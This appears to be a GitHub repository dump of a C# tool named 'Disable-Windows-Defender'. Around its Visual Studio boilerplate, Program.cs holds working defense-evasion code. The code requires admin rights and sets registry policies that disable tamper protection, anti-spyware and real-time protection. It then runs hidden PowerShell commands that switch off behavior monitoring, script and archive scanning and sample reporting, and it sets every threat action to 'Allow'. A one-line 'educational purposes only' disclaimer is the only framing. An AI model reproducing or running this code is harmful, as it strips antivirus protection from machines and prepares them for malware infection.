Repository: NYAN-x-CAT/Disable-Windows-Defender
Branch: master
Commit: ab74d888661a
Files: 7
Total size: 19.3 KB
Directory structure:
gitextract_4q9nv3p0/
├── .gitattributes
├── .gitignore
├── Disable-Windows-Defender/
│ ├── Disable-Windows-Defender.csproj
│ ├── Program.cs
│ ├── Properties/
│ │ └── AssemblyInfo.cs
│ └── app.manifest
└── Disable-Windows-Defender.sln
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# JetBrains Rider
.idea/
*.sln.iml
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
================================================
FILE: Disable-Windows-Defender/Disable-Windows-Defender.csproj
================================================
Debug
AnyCPU
{501E3FDC-575D-492E-90BC-703FB6280EE2}
WinExe
Disable_Windows_Defender
Disable-Windows-Defender
v4.0
512
true
AnyCPU
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4
AnyCPU
pdbonly
true
bin\Release\
TRACE
prompt
4
app.manifest
================================================
FILE: Disable-Windows-Defender/Program.cs
================================================
using System;
using Microsoft.Win32;
using System.Diagnostics;
using System.Security.Principal;
// │ Author : NYAN CAT
// │ Name : Disable Windows Defender v1.1
// │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Disable_Windows_Defender
{
class Program
{
static void Main()
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
CheckDefender();
}
private static void RegistryEdit(string regPath, string name, string value)
{
try
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree))
{
if (key == null)
{
Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord);
return;
}
if (key.GetValue(name) != (object)value)
key.SetValue(name, value, RegistryValueKind.DWord);
}
}
catch { }
}
private static void CheckDefender()
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "powershell",
Arguments = "Get-MpPreference -verbose",
UseShellExecute = false,
RedirectStandardOutput = true,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
};
proc.Start();
while (!proc.StandardOutput.EndOfStream)
{
string line = proc.StandardOutput.ReadLine();
if (line.StartsWith(@"DisableRealtimeMonitoring") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection
else if (line.StartsWith(@"DisableBehaviorMonitoring") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring
else if (line.StartsWith(@"DisableBlockAtFirstSeen") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true");
else if (line.StartsWith(@"DisableIOAVProtection") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments
else if (line.StartsWith(@"DisablePrivacyMode") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history
else if (line.StartsWith(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.EndsWith("False"))
RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup
else if (line.StartsWith(@"DisableArchiveScanning") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files
else if (line.StartsWith(@"DisableIntrusionPreventionSystem") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection
else if (line.StartsWith(@"DisableScriptScanning") && line.EndsWith("False"))
RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans
else if (line.StartsWith(@"SubmitSamplesConsent") && !line.EndsWith("2"))
RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting
else if (line.StartsWith(@"MAPSReporting") && !line.EndsWith("0"))
RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting
else if (line.StartsWith(@"HighThreatDefaultAction") && !line.EndsWith("6"))
RunPS("Set-MpPreference -HighThreatDefaultAction 6 -Force"); // high level threat // Allow
else if (line.StartsWith(@"ModerateThreatDefaultAction") && !line.EndsWith("6"))
RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat
else if (line.StartsWith(@"LowThreatDefaultAction") && !line.EndsWith("6"))
RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat
else if (line.StartsWith(@"SevereThreatDefaultAction") && !line.EndsWith("6"))
RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat
}
}
private static void RunPS(string args)
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "powershell",
Arguments = args,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
};
proc.Start();
}
}
}
================================================
FILE: Disable-Windows-Defender/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("Disable-Windows-Defender")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Disable-Windows-Defender")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("501e3fdc-575d-492e-90bc-703fb6280ee2")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: Disable-Windows-Defender/app.manifest
================================================
================================================
FILE: Disable-Windows-Defender.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.271
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Disable-Windows-Defender", "Disable-Windows-Defender\Disable-Windows-Defender.csproj", "{501E3FDC-575D-492E-90BC-703FB6280EE2}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{501E3FDC-575D-492E-90BC-703FB6280EE2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{501E3FDC-575D-492E-90BC-703FB6280EE2}.Debug|Any CPU.Build.0 = Debug|Any CPU
{501E3FDC-575D-492E-90BC-703FB6280EE2}.Release|Any CPU.ActiveCfg = Release|Any CPU
{501E3FDC-575D-492E-90BC-703FB6280EE2}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {EB968619-2BD4-445D-B575-8622843FB2C4}
EndGlobalSection
EndGlobal